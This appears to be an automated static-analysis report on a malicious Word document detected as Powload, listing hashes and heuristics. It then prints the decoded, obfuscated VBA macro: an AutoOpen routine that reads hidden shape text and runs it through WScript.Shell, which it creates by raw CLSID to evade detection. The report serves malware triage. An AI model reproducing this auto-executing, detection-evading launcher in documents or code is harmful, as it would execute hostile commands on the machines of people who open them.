Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 afb95c94e6873c86…

MALICIOUS

Office (OLE)

138.1 KB Created: 2018-11-28 14:11:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 80606700ff09c925bd4a56cc687aa91f SHA-1: 2efea78b94f3555993986a7c2fc13fdc47e68703 SHA-256: afb95c94e6873c86590d0ab3bdf56bd83b1ada211fcc8b413fba54d244471ce3
212 Risk Score

Heuristics 8

  • ClamAV: Doc.Malware.Powload-6813874-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6813874-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + NXFHcPq + NiEXtr + SjwMs + cbKrzOSQ)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + NXFHcPq + NiEXtr + SjwMs + cbKrzOSQ)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7353 bytes
SHA-256: a608e9357e368a852156da2e494f22d8e6b8ec6ccf39fca08a34dcf06b33c962
Detection
ClamAV: No threats found
Obfuscation or payload: likely
162 of 246 identifiers look randomly generated (e.g. 'CwhpKNbbRl') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GARczMqm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case vkrIvo
      Case 261796299
         JMPfnbvWX = CBool(PIMdwq)
         XozAFqzj = 202977267
      Case 254520823
         BwZTiSn = Atn(aJpVSAf)
         oDwSlB = Atn(150279987 * CLng(161171088))
   End Select
         For Each opEWS In IoUUarvat
         WPbhSjzZf = ffUpA * CDate(BTtciGH * jjwjES) * dFcPluqhH / Sin(iqKQdUiU) / qbjQH + 108102333 - 51234510 + Chr(94127773) + (liTVM * CasZOi)
Next
   On Error Resume Next
Select Case wbSfAuHqB
      Case 228511584
         MWQBzzj = CBool(iplArb)
         EBzJRFzYj = 140090619
      Case 317061610
         CORXFoUc = Atn(HjQGqziK)
         bbEJpG = Atn(281881762 * CLng(290387237))
   End Select
         For Each QMzhjD In iwQRfL
         wIzRiDb = VOVuU * CDate(sZLjNXEQ * ZDNvMAOs) * PFFBsoIo / Sin(IrjLlidl) / EkSnRhX + 152978737 - 94832442 + Chr(135138031) + (PHGVn * PcqjWYY)
Next
Set mnDPzzDM = Shapes("CwhpKNbbRl")
   On Error Resume Next
Select Case BXfUnH
      Case 57851
         RzRMWR = CBool(ZJPFj)
         tTPSvJ = 198933616
      Case 105961790
         VBHWTPR = Atn(KzNSa)
         UJVBwsLR = Atn(85127322 * CLng(240300735))
   End Select
         For Each IDPCrwVCw In PFAzrHz
         HVBSk = IaHhXJEpW * CDate(LMCHSzr * iGFEUD) * kLNFO / Sin(pSUtRqoin) / aiVmfFr + 246706414 - 53337129 + Chr(201585195) + (odpEFEcn * rjIpVtiOB)
Next
   On Error Resume Next
Select Case kCjBkNGiv
      Case 179842107
         KQzTP = CBool(WINstzHPE)
         UXMzjLK = 106854421
      Case 50139025
         voBBioWD = Atn(HcQiaTF)
         BrFcm = Atn(208979615 * CLng(235211728))
   End Select
         For Each LjbWwGhM In whGLJFaD
         zBDolfaH = ZCEJJ * CDate(QXFuhd * vEAcm) * srlfYwiih / Sin(wvvqzIK) / oYovmzf + 150600169 - 62911840 + Chr(313256652) + (zoItb * QnWjKa)
Next
wKlRJ = "" + bzjFBo + rifVzRZ + LmLrpjqa + mWdkzb + mnDPzzDM.TextFrame.TextRange.Text + YjUEDZp + vJiGmDId + uBBpuTAn
   On Error Resume Next
Select Case Mzupinujk
      Case 58059155
         XJHHcGwhs = CBool(YWNnXzi)
         vvSVp = 327101863
      Case 331789580
         PXXUt = Atn(EqNtLoc)
         KjBXnajCG = Atn(262793553 * CLng(106085712))
   End Select
         For Each pMcBUJI In qZJYbBS
         Ziophvl = URJXWMQj * CDate(UhrNL * BfCIkZc) * mIIcczart / Sin(sjCAlDd) / aUHUa + 64122061 - 90789514 + Chr(29569258) + (KimAKrVX * Njnjdc)
Next
   On Error Resume Next
Select Case FoowV
      Case 157925559
         JAARS = CBool(tiZtQn)
         jWkiKG = 12526672
      Case 298256573
         IjwQi = Atn(LwbTr)
         GKiCRJp = Atn(196775958 * CLng(107896437))
   End Select
         For Each UEFXiEFlO In HErQVBi
         WbRwvnaM = jtwMP * CDate(RPrLLbHs * EVWCSShPf) * HoZXJ / Sin(wVBYsS) / rPaAd + 282037331 - 128943292 + Chr(50025956) + (ibsZRY * kzdRGIzrr)
Next
   On Error Resume Next
Select Case OUPWOQjo
      Case 251591343
         pYXKlFHSK = CBool(XKjqbzhz)
         WFAWp = 175999019
      Case 164045125
         UcOzV = Atn(ssMtU)
         UDRWUJE = Atn(266638292 * CLng(161282208))
   End Select
         For Each OihmPkoCh In MznpvlBH
         zOFNdhSo = CjWkiZN * CDate(SjnIEKMk * WQbaj) * zAajJ / Sin(EEwwJz) / NcPNc + 105572309 - 123600096 + Chr(121896687) + (ftDtdT * BMDSYY)
Next
   On Error Resume Next
Select Case NsCjvOaRo
      Case 131495540
         lwcodjh = CBool(zkbFMAAB)
         jikwnwVN = 201509120
      Case 288855890
         djCjkaCjr = Atn(PwZwF)
         lmqivN = Atn(284979970 * CLng(226420251))
   End Select
         For Each jfzAG In zroLShr
         lwUKZUk = Bihkao * CDate(zQpTd * uFfki) * Gklmju / Sin(EkaCRO) / YiOSWAK + 229956099 - 282008199 + Chr(306754750) + (ONTrsoa * EdaPwBpIk)
Next
Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + NXFHcPq + NiEXtr + SjwMs + cbKrzOSQ)
   On Error Resume Next
Select Case ZjNFGj
      Case 199673747
         nTcWhzhs = CBool(wACwH)
         LqTHrSzqw = 211736412
      Case 199242520
         jRnXkwr = Atn(KahrqmK)
         tAZTRmBP = Atn(258092708 * CLng(167719228))
   End Select
         For Each QnciqDaA In RYPEGkn
         IbQEIOzz = LGuPY * CDate(LLbjhvro * ljTUkV) * hwQGLI / Sin(IZfhksTG) / toEsfB + 41348705 - 278237774 + Chr(114939235) + (ATYudMlz * vzRYCdT)
Next
   On Error Resume Next
Select Case jDiivJN
      Case 274639677
         adfjPV = CBool(HOiZjDlqa)
         ckiOKsO = 59811731
      Case 75689277
         iqPuwkv = Atn(MfjEoq)
         czHoc = Atn(115872518 * CLng(265363439))
   End Select
         For Each ZhcKw In lQXEvM
         wodwIb = vmYvoGh * CDate(GUjItipMT * wuaOLzt) * rdIdqTq / Sin(NnJjWq) / qKCVmSiJ + 183630581 - 67412671 + Chr(158776525) + (jDhaYB * OEmci)
Next
   On Error Resume Next
Select Case UTcQu
      Case 304331094
         FkGJMHIbp = CBool(SIqfifXl)
         ndwMIwz = 35843260
      Case 275986799
         DwqkQWtw = Atn(LzLGXSF)
         iXloFf = Atn(137759731 * CLng(41542029))
   End Select
         For Each IYzNPB In omscXa
         ohzab = WYtCjTi * CDate(zzQVi * NVAKwwtSl) * drDOzHG / Sin(tdwkf) / jvTOoobGt + 195567295 - 312464765 + Chr(124370171) + (oifjDmSZ * PUGsqLbA)
Next
Const unuABiiSPLv = 0
   On Error Resume Next
Select Case iwwvs
      Case 61943571
         AhQrnWBGJ = CBool(MQBsUcbzj)
         ifAzns = 341665620
      Case 305614808
         Zwjdcho = Atn(PoLLXWiX)
         VRNWVwIsP = Atn(136174465 * CLng(215418706))
   End Select
         For Each EuWHjk In cmYKj
         MKXFLJVa = XihAEAblN * CDate(IVKuoD * lcuJwGhj) * lkmDL / Sin(tOXnaj) / BBBLzYRB + 106779329 - 230529577 + Chr(13792471) + (XtfjacA * vOqwKB)
Next
   On Error Resume Next
Select Case jfztIC
      Case 15183586
         LzQiNU = CBool(ozfhEajK)
         opaBI = 256627126
      Case 4023709
         IAcLEi = Atn(oBToW)
         CvwDObwS = Atn(270175744 * CLng(263992881))
   End Select
         For Each UuFSc In LYzzW
         rdkOct = HunYm * CDate(czuLDzSLc * JdjLAIPZj) * hGadMTYl / Sin(FjWTXADQ) / tBDBPm + 174940171 - 244567159 + Chr(299299950) + (DwiOrGMV * QwjZhiW)
Next
   On Error Resume Next
Select Case apCmWo
      Case 230211797
         kNhdC = CBool(TLMXAbJ)
         sjUvt = 138325207
      Case 273016335
         hwapSsW = Atn(tdDTFGJU)
         QVCSqfmF = Atn(132730775 * CLng(325256493))
   End Select
         For Each RbvNPN In lDMKapfd
         YqBlZAJ = znErRok * CDate(vCPShpDra * QZGuMnN) * NOSLt / Sin(STOcJo) / ObLfnP + 71243568 - 272035924 + Chr(234777638) + (JLBjkVEb * dIbWfj)
Next
CrwAvwW.Run# wKlRJ, unuABiiSPLv
   On Error Resume Next
Select Case pBtaqzu
      Case 147667916
         QQSQPapb = CBool(OrOSuFsrU)
         hbtAuX = 143020603
      Case 336542615
         jVpLKMOBs = Atn(tllzHS)
         MWHoiwdip = Atn(53072906 * CLng(153658473))
   End Select
         For Each Xstbrs In YjEFjEA
         aivilhzL = rKAXMjVEq * CDate(USzKuFlu * IQbjiR) * Atdli / Sin(hujhrwL) / jBpSf + 90883923 - 174261400 + Chr(128542845) + (ZAnkD * QaSFJfba)
Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.